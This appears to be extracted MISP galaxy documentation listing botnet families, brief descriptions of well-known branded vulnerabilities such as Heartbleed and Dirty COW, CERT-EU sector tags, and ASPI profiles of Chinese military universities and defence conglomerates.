The tag is: misp-galaxy:botnet="Persirai"

Persirai has relationships with:

- similar: misp-galaxy:malpedia="Persirai" with estimative-language:likelihood-probability="likely"

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Chalubo

Since early September, SophosLabs has been monitoring an increasingly prolific attack targeting Internet-facing SSH servers on Linux-based systems that has been dropping a newly-discovered family of denial-of-service bots we’re calling Chalubo. The attackers encrypt both the main bot component and its corresponding Lua script using the ChaCha stream cipher. This adoption of anti-analysis techniques demonstrates an evolution in Linux malware, as the authors have adopted principles more common to Windows malware in an effort to thwart detection. Like some of its predecessors, Chalubo incorporates code from the Xor.DDoS and Mirai malware families.

The tag is: misp-galaxy:botnet="Chalubo"

Table 554. Table References

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AESDDoS

Our honeypot sensors recently detected an AESDDoS botnet malware variant (detected by Trend Micro as Backdoor_LINUX_AESDDOS_J) exploiting a server-side template injection vulnerability (CVE-2019-3396) in the Widget Connector macro in Atlassian Confluence Server, a collaboration software program used by DevOps professionals.

The tag is: `misp-galaxy:botnet="AESDDoS"`

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Arceus

A set of DDoS botnet.

The tag is: `misp-galaxy:botnet="Arceus"`

Arceus is also known as:

- Katura
- MyraV
- myra

Mozi

Mozi infects new devices through weak telnet passwords and exploitation.

The tag is: `misp-galaxy:botnet="Mozi"`

Table 556. Table References

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<tr>
<td><a href="https://threatpost.com/mozi-botnet-majority-iot-traffic/159337/">https://threatpost.com/mozi-botnet-majority-iot-traffic/159337/</a></td>
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<td><a href="https://securityintelligence.com/posts/botnet-attack-mozi-mozied-into-town/">https://securityintelligence.com/posts/botnet-attack-mozi-mozied-into-town/</a></td>
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Branded Vulnerability

List of known vulnerabilities and attacks with a branding.
Meltdown

Meltdown exploits the out-of-order execution feature of modern processors, allowing user-level programs to access kernel memory using processor caches as covert side channels. This is specific to the way out-of-order execution is implemented in the processors. This vulnerability has been assigned CVE-2017-5754.

The tag is: `misp-galaxy:branded-vulnerability="Meltdown"`

Spectre

Spectre exploits the speculative execution feature that is present in almost all processors in existence today. Two variants of Spectre are known and seem to depend on what is used to influence erroneous speculative execution. The first variant triggers speculative execution by performing a bounds check bypass and has been assigned CVE-2017-5753. The second variant uses branch target injection for the same effect and has been assigned CVE-2017-5715.

The tag is: `misp-galaxy:branded-vulnerability="Spectre"`

Heartbleed

Heartbleed is a security bug in the OpenSSL cryptography library, which is a widely used implementation of the Transport Layer Security (TLS) protocol. It was introduced into the software in 2012 and publicly disclosed in April 2014. Heartbleed may be exploited regardless of whether the vulnerable OpenSSL instance is running as a TLS server or client. It results from improper input validation (due to a missing bounds check) in the implementation of the TLS heartbeat extension, thus the bug’s name derives from heartbeat. The vulnerability is classified as a buffer over-read,[5] a situation where more data can be read than should be allowed.

The tag is: `misp-galaxy:branded-vulnerability="Heartbleed"`

Shellshock

Shellshock, also known as Bashdoor, is a family of security bugs in the widely used Unix Bash shell, the first of which was disclosed on 24 September 2014. Many Internet-facing services, such as some web server deployments, use Bash to process certain requests, allowing an attacker to cause vulnerable versions of Bash to execute arbitrary commands. This can allow an attacker to gain unauthorized access to a computer system.

The tag is: `misp-galaxy:branded-vulnerability="Shellshock"`
**Ghost**

The GHOST vulnerability is a serious weakness in the Linux glibc library. It allows attackers to remotely take complete control of the victim system without having any prior knowledge of system credentials. CVE-2015-0235 has been assigned to this issue. During a code audit Qualys researchers discovered a buffer overflow in the `__nss_hostname_digits_dots()` function of glibc. This bug can be triggered both locally and remotely via all the `gethostbyname*()` functions. Applications have access to the DNS resolver primarily through the `gethostbyname*()` set of functions. These functions convert a hostname into an IP address.

The tag is: `misp-galaxy:branded-vulnerability="Ghost"`

**Stagefright**

Stagefright is the name given to a group of software bugs that affect versions 2.2 ("Froyo") and newer of the Android operating system. The name is taken from the affected library, which among other things, is used to unpack MMS messages. Exploitation of the bug allows an attacker to perform arbitrary operations on the victim's device through remote code execution and privilege escalation. Security researchers demonstrate the bugs with a proof of concept that sends specially crafted MMS messages to the victim device and in most cases requires no end-user actions upon message reception to succeed—the user doesn't have to do anything to 'accept' the bug, it happens in the background. The phone number is the only target information.

The tag is: `misp-galaxy:branded-vulnerability="Stagefright"`

**Badlock**

Badlock is a security bug disclosed on April 12, 2016 affecting the Security Account Manager (SAM) and Local Security Authority (Domain Policy) (LSAD) remote protocols[1] supported by Windows and Samba servers.

The tag is: `misp-galaxy:branded-vulnerability="Badlock"`

**Dirty COW**

Dirty COW (Dirty copy-on-write) is a computer security vulnerability for the Linux kernel that affects all Linux-based operating systems including Android. It is a local privilege escalation bug that exploits a race condition in the implementation of the copy-on-write mechanism in the kernel's memory-management subsystem. The vulnerability was discovered by Phil Oester. Because of the race condition, with the right timing, a local attacker can exploit the copy-on-write mechanism to turn a read-only mapping of a file into a writable mapping. Although it is a local privilege escalation, remote attackers can use it in conjunction with other exploits that allow remote execution of non-privileged code to achieve remote root access on a computer. The attack itself does not leave traces in the system log.

The tag is: `misp-galaxy:branded-vulnerability="Dirty COW"`
POODLE

The POODLE attack (which stands for "Padding Oracle On Downgraded Legacy Encryptio") is a man-in-the-middle exploit which takes advantage of Internet and security software clients' fallback to SSL 3.0. If attackers successfully exploit this vulnerability, on average, they only need to make 256 SSL 3.0 requests to reveal one byte of encrypted messages. Bodo Möller, Thai Duong and Krzysztof Kotowicz from the Google Security Team discovered this vulnerability; they disclosed the vulnerability publicly on October 14, 2014 (despite the paper being dated "September 2014" ). Ivan Ristic does not consider the POODLE attack as serious as the Heartbleed and Shellshock attacks. On December 8, 2014 a variation of the POODLE vulnerability that affected TLS was announced.

The tag is: `misp-galaxy:branded-vulnerability="POODLE"`

BadUSB

The ‘BadUSB’ vulnerability exploits unprotected firmware in order to deliver malicious code to computers and networks. This is achieved by reverse-engineering the device and reprogramming it. As the reprogrammed firmware is not monitored or assessed by modern security software, this attack method is extremely difficult for antivirus/security software to detect and prevent.

The tag is: `misp-galaxy:branded-vulnerability="BadUSB"`

ImageTragick

The tag is: `misp-galaxy:branded-vulnerability="ImageTragick"`

Blacknurse

Blacknurse is a low bandwidth DDoS attack involving ICMP Type 3 Code 3 packets causing high CPU loads first discovered in November 2016. The earliest samples we have seen supporting this DDoS method are from September 2017.

The tag is: `misp-galaxy:branded-vulnerability="Blacknurse"`

SPOILER

SPOILER is a security vulnerability on modern computer central processing units that uses speculative execution to improve the efficiency of Rowhammer and other related memory and cache attacks. According to reports, all modern Intel CPUs are vulnerable to the attack. AMD has stated that its processors are not vulnerable.

The tag is: `misp-galaxy:branded-vulnerability="SPOILER"`

Table 557. Table References

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BlueKeep

A ‘wormable’ critical Remote Code Execution (RCE) vulnerability in Remote Desktop Services that could soon become the new go-to vector for spreading malware

The tag is: mipsgalaxy:branded-vulnerability="BlueKeep"

Table 558. Table References

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<td><a href="https://www.welivesecurity.com/2019/05/22/patch-now-bluekeep-vulnerability/">https://www.welivesecurity.com/2019/05/22/patch-now-bluekeep-vulnerability/</a></td>
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Cert EU GovSector

Cert EU GovSector is a cluster galaxy available in JSON format at this location. The JSON format can be freely reused in your application or automatically enabled in MISP.

authors

Various

Constituency

The tag is: mipsgalaxy:cert-eu-govsector="Constituency"

EU-Centric

The tag is: mipsgalaxy:cert-eu-govsector="EU-Centric"

EU-nearby

The tag is: mipsgalaxy:cert-eu-govsector="EU-nearby"
World-class

The tag is: `misp-galaxy:cert-eu-govsector="World-class"`

Unknown

The tag is: `misp-galaxy:cert-eu-govsector="Unknown"`

Outside World

The tag is: `misp-galaxy:cert-eu-govsector="Outside World"`

China Defence Universities Tracker

The China Defence Universities Tracker is a database of Chinese institutions engaged in military or security-related science and technology research. It was created by ASPI's International Cyber Policy Centre.

China Defence Universities Tracker is a cluster galaxy available in JSON format at this location. The JSON format can be freely reused in your application or automatically enabled in MISP.

authors

Australian Strategic Policy Institute

Academy of Military Science (中国人民解放军军事科学院)

AMS is responsible for leading and coordinating military science for the whole military. AMS is involved in not only the development of theory, strategy, and doctrine but also advancing national defense innovation. Pursuant to the PLA reforms, AMS has undergone dramatic changes starting in June 2017. At a July 2017 ceremony marking the AMS’s reorganisation, Xi urged the AMS to construct a ‘world-class military scientific research institution.’ Through the National Defence Science and Technology Innovation Institute, the AMS is pursuing research in cutting-edge technologies including unmanned systems, artificial intelligence, biotechnology and quantum technology.

The tag is: `misp-galaxy:china-defence-universities="Academy of Military Science (中国人民解放军军事科学院)"`

Table 559. Table References

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Aero Engine Corporation of China (中国航空发动机集团有限公司)

AECC is a leading producer of aircraft parts for the People’s Liberation Army (PLA), having
separated from its parent company the Aviation Industry Corporation of China (AVIC) in 2016. The company reports having 27 affiliated or subordinate companies, three major listed companies, and 84,000 staff. AVIC and the Commercial Aircraft Corporation of China (also known as COMAC) are major shareholders in AECC. AECC’s main products include aircraft engines, combustion gas turbines, and transmission systems. AECC also develops aircraft power units, helicopter drive systems, monocrystalline blades, turbine disks, and graphene. AECC was established in order to improve China’s capability in developing domestically built aircraft engines as part of the ‘Made in China 2025’ program. A priority is strengthening its supply chains within China. Though indigenously developed engines have proven challenging for AECC, the company had purported success in providing thrust vector control technology for the J-10B fighter jet.

The tag is:  

*misp-galaxy:china-defence-universities=*“Aero Engine Corporation of China (中国航空发动机集团有限公司)”

**Table 560. Table References**

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**Air Force Command College (中国人民解放军空军指挥学院)**

The PLA Air Force Command College in Beijing is considered the PLA Air Force’s ‘peak institution for educating mid-rank and senior officers’ for command posts across the service. The college has a long history and was initially established in Nanjing during the early years of the People’s Republic in 1958. The Air Force Command College offers a range of degree programmes, mainly at the postgraduate level, including training in military disciplines such as military history, strategy, and tactics. It has published research on control science and radar. The college’s other specialties include battlefield command, military operations as well as political–ideological education.

The tag is:  

*misp-galaxy:china-defence-universities=*“Air Force Command College (中国人民解放军空军指挥学院)”

**Table 561. Table References**

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**Air Force Communication NCO Academy (中国人民解放军空军通信士官学校)**

The Air Force Communications Officers Academy is the PLA’s premier institution for the training of non-commissioned officers in communications systems and security. Established in 1986 as the Dalian Communications NCO College, the institution was renamed after Xi Jinping’s military reforms in 2017. The academy’s areas of research include command automation and satellite communications, along with wired and wireless communications.

The tag is:  

*misp-galaxy:china-defence-universities=*“Air Force Communication NCO Academy (中国人民解放军空军通信士官学校)”
Air Force Early Warning Academy (中国人民解放军空军预警学院)

The Air Force Early Warning Academy is ‘an institution that trains military personnel from the PLA Air Force and Navy’s radar and electronic warfare units in command, engineering and technology’ that was established after the amalgamation of the Air Defence Academy and Radar College in 1958. As such, the Air Force Early Warning Academy focuses its research on radar engineering, information command systems engineering, networked command engineering, and early warning detection systems.

The tag is: mish-galaxy:china-defence-universities="Air Force Early Warning Academy (中国人民解放军空军预警学院)"

Air Force Engineering University (中国人民解放军空军工程大学)

The Air Force Engineering University (AFEU) is one of the PLA’s five comprehensive universities alongside NUDT, Naval Engineering University, PLA Information Engineering University and Army Engineering University. It trains students in a variety of engineering and military disciplines related to air combat. AFEU currently has around 8,000 students, including 1,600 postgraduate students. Its priority areas include technical studies in information and communication systems engineering as well as in social sciences such as in professional military training. Research into unmanned aerial vehicle technology is another important area of research at the university. In 2017, China’s Ministry of Education ranked AFEU equal fourth for armament science out of nine universities, only awarding it a B- grade for the discipline.

Colleges under AFEU include:

The tag is: mish-galaxy:china-defence-universities="Air Force Engineering University (中国人民解放军空军工程大学)"

Air Force Flight Academy Shijiazhuang (空军石家庄飞行学院)

Air Force Flight Academy Shijiazhuang (空军石家庄飞行学院)

The tag is: mish-galaxy:china-defence-universities="Air Force Flight Academy Shijiazhuang (空军石家庄飞行学院)"
Air Force Harbin Flight Academy (空军哈尔滨飞行学院)

The Academy is home to the Air Force Harbin Flight Academy Simulation Training Center, 2,500m² large-scale aircraft simulator where students can train in simulated transport and bomber aircraft. The Academy hopes to continue developing the Simulation Training Center into a ‘laboratory for air operations,’ including advanced trainings like simulated tactical confrontations.

The tag is: misp-galaxy:china-defence-universities="Air Force Harbin Flight Academy (空军哈尔滨飞行学院)"

Air Force Logistics University (中国人民解放军空军后勤学院)

The Air Force Logistics University is an institution devoted to the study of command, management and technology for the PLA, established in Shanxi by the Central Military Commission in 1954. The university focuses its research on ‘management engineering’ for military equipment such as weaponry and aircraft fuel and also maintains research programmes on air battle command and personnel management.

The tag is: misp-galaxy:china-defence-universities="Air Force Logistics University (中国人民解放军空军后勤学院)"

Air Force Medical University (中国人民解放军空军军医大学)

The Air Force Medical University, also known as the Fourth Military Medical University, is the PLA’s premier institution for research into medical and psychological sciences, having been placed under command of the Air Force after Xi Jinping’s military reforms in 2017. Its major areas of study are medical and psychological sciences tailored for personnel engaging in air and space operations, military preventative medicine and various other forms of clinical research. The Air Force Medical University conducts significant amounts of psychological research. Scientists from the Air Force Medical University have written studies on suicide, mental health across China, and mental health in military universities. The university’s scientists have also looked at the extent to which mindfulness training can reduce anxiety for undergraduates at military universities, and at how fear induced by virtual combat scenarios impacts decision-making. This indicates that the university is interested in issues of troop morale and decision-making in high-stress situations.
Air Force Research Institute (中国人民解放军空军研究院)

The Air Force Research Institute is an air force scientific research institute, the successor to the Air Force Equipment Academy (空军装备研究院), that was established in 2017. The institute runs the Key Laboratory of Complex Aviation System Simulation (复杂航空系统仿真国防重点实验室) and carries out research on areas such as aircraft design, flight control, guidance and navigation, and electronic countermeasures.

Air Force Xi’an Flight Academy (中国人民解放军空军西安飞行学院)

Created upon the merger of the PLA Air Force’s Second and Fifth Flight Academies in 2011, the Air Force Xi’an Flight Academy specialises in training airmen in aviation while passing on the PLA’s ‘revolutionary traditions’. It remains ‘one of the Air Force’s three advanced institutions in air combat, and is known to train the PLA Air Force’s JJ-7 fighter pilots. Given this focus on training, the institution engages in little scientific research.

Anhui University (安徽大学)

Anhui University is overseen by the Anhui Provincial Government. In January 2019, defence industry agency SASTIND and the Anhui Provincial Government signed an agreement to jointly develop Anhui University. This agreement with SASTIND suggests that the university will increase its role in defense research in the future.
Army Academy of Armored Forces (中国人民解放军陆军装甲兵学院)

The Army Academy of the Armored Forces is China’s lead institute responsible for training and research for armoured combat. This includes a focus on tank warfare, mechanised artillery and infantry operations. The academy offers training in ‘armored combat command, surveillance and intelligence, operational tactics’ as well as in engineering disciplines relevant to operations involving the PLA Ground Force’s armoured corps, such as materials science, mechanical engineering, electrical engineering and automation, communications engineering, weapons systems engineering and photoelectric information science.

The tag is: `misp-galaxy:china-defence-universities="Army Academy of Armored Forces (中国人民解放军陆军装甲兵学院)"`

Table 572. Table References

Links


Army Academy of Artillery and Air Defense (中国人民解放军陆军炮兵防空兵学院)

The Army Academy of Artillery and Air Defense is an institution devoted to training artillery and air defence officers in the PLA Ground Force. Its areas of focus include electrical engineering and automation, munitions engineering and explosives technology, radar engineering, and missile engineering.

The tag is: `misp-galaxy:china-defence-universities="Army Academy of Artillery and Air Defense (中国人民解放军陆军炮兵防空兵学院)"`

Table 573. Table References

Links


Army Academy of Border and Coastal Defense (中国人民解放军陆军边海学院)

With a history dating back to 1941, the Army Academy of Border and Coastal Defense is the only institution of higher education devoted to training PLA Ground Force personnel in border and coastal defence operations. Its subjects of focus include firepower command and control engineering, and command information systems engineering.

The tag is: `misp-galaxy:china-defence-universities="Army Academy of Border and Coastal Defense (中国人民解放军陆军边海学院)"`
Army Aviation College (陆军航空兵学院)

The Army Aviation College is the PLA’s institution responsible for training mid-career helicopter pilots from the PLA Air Force and aviation officers from the PLA Ground Force. The college’s subject areas include aircraft and engine design, aviation communications and air defence systems, flight radar maintenance engineering, and combat aircraft maintenance engineering.

The tag is: `misp-galaxy:china-defence-universities="Army Aviation College (陆军航空兵学院)"`

Army Engineering University (陆军工程大学)

The Army Engineering University was established in 2017 following the abolition of the PLA University of Science and Technology. The university is devoted to research on ‘engineering, technology and combat command systems’ for the PLA Land Force. The university’s areas of research include:

The tag is: `misp-galaxy:china-defence-universities="Army Engineering University (陆军工程大学)"`

Army Infantry Academy (陆军步兵学院)

The Army Infantry Academy is a higher education institution in China devoted to providing elementary training in command for infantry soldiers in the PLA Ground Force. The academy teaches courses in operational disciplines such as command information systems engineering, armored vehicles engineering and weapons systems engineering. As well as providing formal teaching, the Army Infantry Academy also provides oversight for training exercises and electronic warfare simulations.

The tag is: `misp-galaxy:china-defence-universities="Army Infantry Academy (陆军步兵学院)"`
Army Medical University (中国人民解放军陆军军医大学)

The PLA Army Medical University, formerly known as the Third Military Medical University, is a medical education university affiliated with the PLA Ground Force. It was formed in 2017 through a merger with the PLA Western Theater Command Urumqi Comprehensive Training Base’s Military Medical Training Brigade and the Tibet Military Region’s Eighth Hospital. The Army Medical University includes six national key laboratories and 32 Ministry of Education or military key laboratories. It has won military awards for science and technology progress and seven national science and technology prizes.

The tag is: misp-galaxy:china-defence-universities="Army Medical University (中国人民解放军陆军军医大学)"

Table 578. Table References

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Army Military Transportation Academy (中国人民解放军陆军军事交通学院)

The Army Military Transport Academy is a higher education institution devoted to training PLA Ground Force personnel in military transport and logistics. The academy focusses on military transport command engineering, command and automation engineering, ordnance engineering, and armament sustainment command.

The tag is: misp-galaxy:china-defence-universities="Army Military Transportation Academy (中国人民解放军陆军军事交通学院)"

Table 579. Table References

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Army Research Institute (中国人民解放军陆军研究院)

The Army Research Institute is an institution devoted to advanced defence research with applications to land warfare. The institute engages in a variety of defence research including radar technology, lasers, and hybrid electric vehicles. Researchers from the institute are known to have collaborated with partners from China’s civilian universities in areas such as advanced manufacturing and automatic control, and laser technology.

The Army Research Institute collaborates with civilian companies as part of China’s military-civil fusion program. For example, General Guo Guangsheng from the Army Research Institute made a visit to Hong Run Precision Instruments Co. Ltd. (虹润精密仪器有限公司) on 24 August 2019 to assess how the company was performing in its military-civil fusion activities. Researchers from the Army Research Institute have also been involved in the product design and development of dual-use automobiles as part of a military-civil...
fusion project called ‘Research, Development and Commercialisation of Advanced Off-road Passenger Vehicles’ (新一代军民通用高端越野乘用汽车研发及产业化). The project included research into vehicles such as the BJ80 military and civilian off-road passenger vehicles as well as the BJ40L off-road vehicle.

The tag is: `misp-galaxy:china-defence-universities="Army Research Institute (中国人民解放军陆军研究院)"

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**Army Service Academy (中国人民解放军陆军勤务学院)**

The Army Service Academy is an institution of higher education in the PLA devoted to training personnel in a variety of logistics disciplines. The logistics disciplines taught at the academy include: fuel logistics, military facility management, military procurement management, and integrated logistics management. Its areas of focus for defence research include military energy engineering, defence engineering, and management science and engineering.

The tag is: `misp-galaxy:china-defence-universities="Army Service Academy (中国人民解放军陆军勤务学院)"

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**Army Special Operations Academy (中国人民解放军陆军特种作战学院)**

The academy’s key subjects include special operations command, surveillance and intelligence, and command information systems engineering.

The tag is: `misp-galaxy:china-defence-universities="Army Special Operations Academy (中国人民解放军陆军特种作战学院)"

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**Aviation Industry Corporation of China (中国航空工业集团有限公司)**

AVIC is a state-owned defence conglomerate established in 2008 that focuses on providing aerospace products for military and civilian customers. AVIC’s main product lines include a variety of aircraft for freight, commercial and military aviation along with other more specialised products such as printed circuit boards, liquid crystal displays and automotive parts, according to Bloomberg. AVIC also provides services to the aviation sector through flight testing, engineering, logistics and asset management. The conglomerate has over 400,000 employees and has a
controlling share in around 200 companies. AVIC has over 25 subsidiaries listed on its website. AVIC is the PLA Air Force’s largest supplier of military aircraft, producing fighter jets, strike aircraft, unmanned aerial vehicles and surveillance aircraft. Along with its core work on military aircraft, AVIC also produces surface-to-air, air-to-surface and air-to-air missiles. Its headline projects include the J-10 and the J-11 fighter aircraft. AVIC’s subsidiary, the Shenyang Aircraft Corporation, was responsible for delivery of the J-15 fighter. Another subsidiary of AVIC, the Chengdu Aerospace Corporation, developed the PLA-AF’s J-20 stealth fighter jet.

The tag is: misp-galaxy:china-defence-universities="Aviation Industry Corporation of China (中国航空工业集团有限公司)"

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**Aviation University of Air Force (中国人民解放军空军航空大学)**

AUAF is one of China’s main institutions devoted to the training of air force pilots. Its areas of focus are training in flight command and research into aeronautical engineering. Disciplines taught at AUAF include command science and engineering, aerospace science and technology as well as political work and military command. AUAF scientists publish and attend conferences on radar technology and electronic countermeasures. For example, scientists from AUAF’s Information Countermeasures Division co-authored a publication on radar target recognition with a researcher from the PLA's Unit 94936 – an aviation unit stationed in Hangzhou. AUAF scientists have also done notable work on complex systems radar and signal pre-sorting.

The tag is: misp-galaxy:china-defence-universities="Aviation University of Air Force (中国人民解放军空军航空大学)"

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**Beihang University (北京航空航天大学)**

Beihang University engages in very high levels of defence research as one of the ‘Seven Sons of National Defence’ subordinate to the Ministry of Industry and Information Technology. The university specialises in aviation and spaceflight research. The top four employers of Beihang graduates in 2018 were all state-owned missile or defence aviation companies. In total, 29% of 2018 Beihang graduates who found employment were working in the defence sector. Beihang scientists are involved in the development of Chinese military aircraft and missiles. In 2018, the university signed a comprehensive strategic cooperation agreement with China Aerospace Science and Technology Corporation, a state-owned conglomerate that produces ballistic missiles and satellites. The university is also noteworthy for its leading research on stealth technology. Beihang hosts at least eight major defence laboratories working on fields such as aircraft engines, inertial navigation and fluid dynamics.
Beijing Electronic Science and Technology Institute (北京电子科技学院)

BESTI is a secretive university that trains information security experts for the bureaucracy. The institute is the only university run by the CCP General Office, which manages administrative matters for the Central Committee. The General Office is usually run by one of the general secretary’s most trusted aides. It oversees China’s cryptographic and state secrets agency as well as security for the party’s leadership. BESTI has a student population of around 2,000 and has strict admission requirements. Students at the university are scrutinized for their political beliefs, and are typically CCP or Communist Youth League members. The activities of their relatives are screened for political issues. Having no parents or siblings who worked abroad or were involved in ‘illegal organisations’ is a condition of enrolment. The institute claims to count 50 ministerial-level party officials among its 12,000 graduates. BESTI has a close relationship with Xidian University and Beijing University of Posts and Telecommunications. The two universities are its primary collaborators on scientific papers. BESTI runs joint master’s programs with Xidian University in cryptography, information and communication engineering, and computer applications technology. It also has joint doctoral programs with the University of Science and Technology of China and Beijing University of Posts and Telecommunications in cybersecurity. The university runs the Key Laboratory of Information Security (信息安全重点实验室). Several websites claim that it runs a joint laboratory with the Chinese Academy of Sciences Institute of High Energy Physics, but this could not be confirmed.

Beijing Institute of Technology (北京理工大学)

BIT is one of the ‘Seven Sons of National Defence’ supervised by MIIT. It is a leading centre of military research and one of only fourteen institutions accredited to award doctorates in weapons science. In 2017, China’s Ministry of Education ranked BIT and Nanjing University of Science and Technology as the country’s top institutions for weapons science. It has received the most defence research prizes and defence patents out of all China’s universities. 31.80% of BIT graduates in 2018 who found employment were working in the defence sector. BIT’s claimed achievements include producing the PRC’s first light tank, first two-stage solid sounding rocket and first low-altitude altimetry radar. The university also states that it carries out world-class research on several areas.
of missile technology including “precision strikes, high damage efficiency, maneuver penetration, long-range suppression, and military communications systems and counter-measures”. In 2018, BIT announced that it was running a four-year experimental program training some of China’s top high school students in intelligent weapons systems.BIT is the chair of the B8 Cooperation Innovation Alliance (B8协同创新联盟 or 中国兵器协同创新联盟), a group of eight Chinese research institutions that specialize in weapons science—the ‘B’ in ‘B8’ stands for Chinese work for armaments, bingqi (兵器).BIT’s central role in advancing PLA warfighting capability is demonstrated by the fact that it participated in the development of equipment used by 22 of the 30 squads in the 2009 military parade for the 60th anniversary of the founding of the PRC.

The tag is: *misp-galaxy:china-defence-universities=“Beijing Institute of Technology (北京理工大学)”*

### Beijing University of Chemical Technology (北京化工大学)

BUCT is subordinate to the Ministry of Education. The university engages in high levels of defence research. In 2016, the Ministry of Education and defence industry agency SASTIND agreed to jointly construct BUCT, a move designed to expand its involvement in defence research. Between 2011 and 2015, the university’s spending on defence research reached RMB272 million (AUD56 million), approximately 15% of the university’s research spending and an increase of around 50% over the previous five years. BUCT specialises in the development and application of critical materials for the defence industry. Its research on carbon fibres has been applied to the aerospace industry. BUCT holds secret-level security credentials, allowing it to participate in classified defence and weapons technology projects.

The tag is: *misp-galaxy:china-defence-universities=“Beijing University of Chemical Technology (北京化工大学)”*

### Beijing University of Posts and Telecommunications (北京邮电大学)

BUPT is subordinate to the Ministry of Education in addition to being jointly constructed by the Ministry of Industry and Information Technology. BUPT is one of eight Chinese universities known to have received top-secret security credentials. Since its establishment, the university has focused on information engineering and computer science, and has continued to produce important defence and security technology research. The School of Cyberspace Security is home to one of the university’s two defence laboratories—the Key Laboratory of Network and Information Attack & Defense Technology of Ministry of Education—which carries out research for the Chinese military.
related to cyber attacks. BUPT is a member of several military-civilian fusion (MCF) alliances and has been awarded for its contributions to MCF and the PLA. During the past three years, major employers of BUPT graduates include the Ministry of State Security, the Ministry of Public Security and MIIT. This suggests a close relationship between BUPT and China’s security and intelligence agencies.

The tag is: `misp-galaxy:china-defence-universities="Beijing University of Posts and Telecommunications (北京邮电大学)"

### Central South University (中南大学)

Out of all universities subordinate to the MOE, CSU reportedly receives the most military research funding and was the first to receive a weapons production license. In 2008 and 2011 respectively, the defence industry agency SASTIND and the Ministry of Education (MOE) signed agreements to jointly supervise CSU. Under this arrangement, SASTIND committed to expanding CSU’s involvement in defence research and support the development of its School of Aeronautics and Astronautics and Military Industry Technology Research Institute. CSU’s defence research appears to focus on metallurgy, materials science, and aviation technology, including the development of heat-resistant materials for aeroplane and rocket engines. The university has been involved in the development of China’s first atomic bomb, first intermediate-range ballistic missile, and first nuclear submarine. In 2018, it signed a strategic cooperation agreement with the Chinese Academy of Launch Vehicle Technology, a subsidiary of China Aerospace Science and Technology Corporation that is included on the US BIS Entity List for its involvement in developing rockets.

The tag is: `misp-galaxy:china-defence-universities="Central South University (中南大学)"

### Changchun University of Science and Technology (长春理工大学)

CUST is primarily supervised by the Jilin Provincial Government but has also been under the administration of SASTIND and its predecessors for over 30 years over its history. The university specialises in photoelectric technology and has a strong focus on defence research. CUST describes itself as having ‘safeguarding national defence as its sublime responsibility and sacred mission.’ CUST is a member of the B8 Cooperation Innovation Alliance (B8协同发展 or 兵器协同发展), a group of eight Chinese research institutions that specialize in armaments science—the ‘B’ in ‘B8’ stands for Chinese work for armaments, bingqi (兵器). In April 2018, CUST established the School of Artificial Intelligence (人工智能学院) and the Artificial Intelligence Research Institute (人工智能研究院). CUST
researchers working on AI are likely involved in research related to facial recognition technology.

The tag is: misp-galaxy:china-defence-universities="Changchun University of Science and Technology (长春理工大学)"

Table 591. Table References

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**China Aerodynamics Research and Development Center (中国空气动力研究与发展中心)**

CARDC claims to be China's largest aerodynamics research and testing base. It hosts the State Key Laboratory of Aerodynamics (空气动力学国家重点实验室), which includes five wind tunnels and a large computer cluster. CARDC is heavily involved in research on hypersonics. While CARDC is a military unit, its website does not mention this. The PLA officers leading the facility are instead pictured on its website in civilian clothes (pictured: CARDC director, Major General Fan Zhaolin (范召林) in uniform (above) and in civilian attire on CARDC's website (below).

The tag is: misp-galaxy:china-defence-universities="China Aerodynamics Research and Development Center (中国空气动力研究与发展中心)"

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**China Aerospace Science and Industry Corporation (中国航天科工集团有限公司)**

CASIC specialises in defence equipment and aerospace products, particularly short- and medium-range missiles. CASIC is a leading provider to the Chinese military of high-end capabilities such as air-defence, cruise, and ballistic missile systems along with space launch vehicles, micro-satellites and anti-satellite interceptors, according to Mark Stokes and Dean Cheng. CASIC employs over 146,000 employees and is on the Fortune 500 list with revenue exceeding USD37 billion (AUD55 billion). Although defence products form part of CASIC’s main product line, the company also produces products for civilian customers such as electronics, communications equipment and medical equipment. Nevertheless, CASIC claims that it ‘will always uphold its core value of ranking national interests above all’, which indicates that civilian products receive less priority than defence equipment.

The tag is: misp-galaxy:china-defence-universities="China Aerospace Science and Industry Corporation (中国航天科工集团有限公司)"

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China Aerospace Science and Technology Corporation (中国航天科技集团)

CASC was established in 1999 as a defence aerospace conglomerate. The company is primarily focused on ‘developing carrier rockets, various kinds of satellites, ... and tactical missile systems.’ With revenues nearing USD38 billion (AUD55 billion), CASC employs nearly 180,000 personnel and is on the Fortune 500 list. PLA experts Mark Stokes and Dean Cheng have noted that CASC’s main products for the PLA include ‘ballistic missiles and space launch vehicles, large solid rocket motors, liquid fuelled engines, satellites, and related sub-assemblies and components.’ The Federation of American Scientists claims CASC is particularly advanced in high-energy propellant technology, satellite applications, strap-on boosters and system integration. CASC maintains an investment business which may be geared towards civilian purposes, according to Bloomberg. The Federation of American Scientists notes that some civilian product lines for CASC include ‘machinery, chemicals, communications equipment, transportation equipment, computers, medical care products and environmental protection equipment.’ CASC oversees multiple research academies, which have been separately identified by Mark Stokes and Dean Cheng and by the Nuclear Threat Initiative. The Nuclear Threat Initiative has identified that CASC has the following subordinate companies:

The tag is: misp-galaxy:china-defence-universities="China Aerospace Science and Technology Corporation (中国航天科技集团)"

Table 594. Table References

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China Coast Guard Academy (中国人民武装警察部队海警学院)

The China Coast Guard Academy is an institution of higher learning that trains personnel for entry into China’s maritime border defence agency. The academy teaches research and training in maritime law enforcement, warship technology as well as surveillance and intelligence disciplines. The China Coast Guard Academy established the Large Surface Vessel Operation and Simulation Laboratory (大型船艇操纵仿真实验室) in 2016, which focuses on the development of white-hulled boats for the China Coast Guard.

The tag is: misp-galaxy:china-defence-universities="China Coast Guard Academy (中国人民武装警察部队海警学院)"

Table 595. Table References

Links

China Electronics Corporation (中国电子信息产业集团有限公司)

CEC is a state-owned conglomerate that produces dual-use electronics. The company was established in 1989 to produce semi-conductors, electronic components, software and telecommunications products. The company describes itself as a defence industry conglomerate. CEC is one of China’s largest companies with nearly 120 thousand employees. CEC claims to hold 22 subordinate enterprises and 14 listed companies. Global Security has provided a list of CEC’s 36 member companies in English. CEC is divided into two operational groups. First is the China Electronics Party Institute (中国电子党校), which provides disciplinary oversight and organises communist party activities within CEC. Second is the Science and Technology Committee (科学技术委员会), which is responsible for research and development within CEC. CEC’s defence electronics are developed by the Military Engineering Department (军工委) within CEC’s Science and Technology Committee. Key defence electronics produced by CEC include tracking stations, radar technology, as well as command and control systems. The company maintains its own office for the management of classified information related to defence research. The Federation of American Scientists has identified CEC’s defence-related enterprises on a list that can be found here.

The tag is:  
misp-galaxy:china-defence-universities="China Electronics Corporation (中国电子信息产业集团有限公司)"

